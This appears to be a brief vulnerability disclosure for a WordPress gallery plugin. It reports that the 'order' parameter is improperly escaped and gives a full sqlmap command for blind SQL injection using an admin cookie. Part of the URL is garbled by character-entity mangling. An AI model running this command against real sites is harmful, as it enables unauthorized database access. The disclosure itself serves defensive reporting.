The plugin is still affected and has been closed. Type user access: admin user. $_GET[‘order’] is escaped wrong. Attack with Blind Injection
python sqlmap.py -u “http://www.example.com/wp-admin/admin.php?page=zm_gallery&orderby;=nameℴ=desc” --dbs --cookie=“cookie of admin user” --level=5 --dbms=mysql